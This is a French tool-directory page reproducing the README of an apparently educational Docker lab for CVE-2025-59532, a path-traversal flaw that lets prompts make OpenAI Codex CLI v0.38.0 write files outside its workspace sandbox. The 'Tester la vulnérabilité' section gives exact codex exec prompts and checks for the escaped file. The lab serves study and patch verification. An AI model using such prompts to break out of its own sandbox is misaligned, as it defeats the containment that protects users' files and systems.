Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-59532-poc — Un environnement de recherche basé sur Docker pour analyser CVE-2025-59532, une vulnérabilité de traversée de chemin dans OpenAI Codex CLI qui permet l'écriture arbitraire de fichiers en dehors du bac à sable de l'espace de travail prévu. Fait partie du cours CMU : 18-739 Hacking & Offensive Security à l'automne 2025. | Kitploit
Outils/GitHubGitHub/baktistr/cve-2025-59532-poc
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Un environnement de recherche basé sur Docker pour analyser CVE-2025-59532, une vulnérabilité de traversée de chemin dans OpenAI Codex CLI qui permet l'écriture arbitraire de fichiers en dehors du bac à sable de l'espace de travail prévu. Fait partie du cours CMU : 18-739 Hacking & Offensive Security à l'automne 2025.

GitHub
baktistr/cve-2025-59532-poc

cve-2025-59532-poc

Voir le dépôt
13il y a 8 moisPas encore vérifié
Partager

Environnement Docker CVE-2025-59532

Un environnement de recherche basé sur Docker pour analyser CVE-2025-59532, une vulnérabilité de traversée de répertoire dans OpenAI Codex CLI permettant l'écriture arbitraire de fichiers en dehors du bac à sable prévu. Partie du cours CMU : 18-739 Hacking & Offensive Security à l'automne 2025

Pour commencer

Cloner le dépôt

Clonez d'abord ce dépôt :

root@kitploit:~
git clone https://github.com/jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

Ou si vous utilisez SSH :

root@kitploit:~
git clone [email protected]:jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

Description de la CVE

CVE-2025-59532 est une vulnérabilité de traversée de répertoire dans l'outil Codex CLI d'OpenAI qui permet à des attaquants d'écrire des fichiers en dehors du répertoire de travail prévu, contournant les restrictions du bac à sable.

Détails de la vulnérabilité

  • ID CVE : CVE-2025-59532
  • Version concernée : Codex CLI v0.38.0 et antérieures
  • Type de vulnérabilité : Écriture arbitraire de fichier / Traversée de répertoire
  • Sévérité : Élevée
  • Vecteur d'attaque : Un attaquant peut fabriquer des invites qui amènent Codex à écrire des fichiers dans les répertoires parents (par exemple, ../exploit.txt), échappant ainsi au bac à sable même lorsque --sandbox workspace-write est activé.
  • Impact : Création non autorisée de fichiers dans les répertoires système, possibilité d'élévation de privilèges et compromission des limites de sécurité du conteneur.
  • Correctif : Corrigé dans la version v0.39.0 avec une validation et une assainissement améliorés des chemins.

Fonctionnement

La vulnérabilité exploite une validation insuffisante des chemins dans l'implémentation du bac à sable du répertoire de travail. Lorsque le mode de bac à sable workspace-write est activé, Codex devrait restreindre les opérations sur les fichiers au répertoire de travail désigné. Cependant, dans la version v0.38.0, la validation des chemins échoue à traiter correctement les séquences de traversée relatives (../), permettant à un attaquant d'écrire des fichiers en dehors du bac à sable en demandant à l'IA d'utiliser des références de répertoire parent.

Prérequis

  • Docker installé sur votre système
  • Clé API OpenAI (obtenez-en une sur https://platform.openai.com/api-keys)
  • Compréhension de base de Docker et des opérations en ligne de commande
  • Git (pour cloner le dépôt)

Construire et exécuter

Construire l'image Docker :

root@kitploit:~
docker build -t cve-2025-59532:latest .

Lancer le conteneur :

root@kitploit:~
docker run -it --rm cve-2025-59532:latest

Utilisation

Cet environnement Docker comprend trois versions de Codex CLI :

  • codex38 - v0.38.0 (version vulnérable)
  • codex39 - v0.39.0 (version corrigée)
  • codex50 - v0.50.0 (dernière version)

Configurer la clé API OpenAI

Une fois à l'intérieur du conteneur, configurez votre clé API OpenAI en exécutant simplement codex en mode interactif et en collant la clé API à cet endroit :

root@kitploit:~
codex

La clé API sera stockée dans ~/.config/codex/auth.json et sera utilisée par toutes les versions de Codex (codex38, codex39, codex50).

Vérifier les versions

root@kitploit:~
codex38 --version  # Devrait afficher v0.38.0 (vulnérable)
codex39 --version  # Devrait afficher v0.39.0 (corrigée)
codex50 --version  # Devrait afficher v0.50.0 (dernière)

Tester la vulnérabilité

Remarque : Le répertoire de travail se trouve dans /workspace/child. La vulnérabilité permet d'écrire dans /workspace (le répertoire parent).

Tester la version vulnérable (v0.38.0) :

root@kitploit:~
codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof1.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Tester la version corrigée (v0.39.0) :

root@kitploit:~
codex39 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof2.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Tester la dernière version (v0.50.0) :

root@kitploit:~
codex50 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof3.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Vérifier l'exploit :

root@kitploit:~
# Vérifier si des fichiers ont été créés en dehors du bac à sable (dans /workspace, pas /workspace/child)
ls -la /workspace/
cat /workspace/exploit_proof1.txt  # Devrait exister si v0.38.0 est vulnérable
cat /workspace/exploit_proof2.txt  # NE DEVRAIT PAS exister si v0.39.0 est corrigée
cat /workspace/exploit_proof3.txt  # NE DEVRAIT PAS exister si v0.50.0 est sécurisée

# Vérifier le répertoire de travail actuel (devrait être vide ou ne contenir que des fichiers de test)
pwd  # Devrait afficher /workspace/child
ls -la /workspace/child/

Consulter les journaux

Pour voir les journaux de débogage détaillés de l'exécution de Codex :

root@kitploit:~
RUST_LOG=debug codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Les journaux de débogage montreront :

  • Les requêtes et réponses API
  • Les tentatives de validation des chemins
  • Les détails des opérations sur les fichiers
  • Le comportement d'application (ou de contournement) du bac à sable
Télécharger l’outil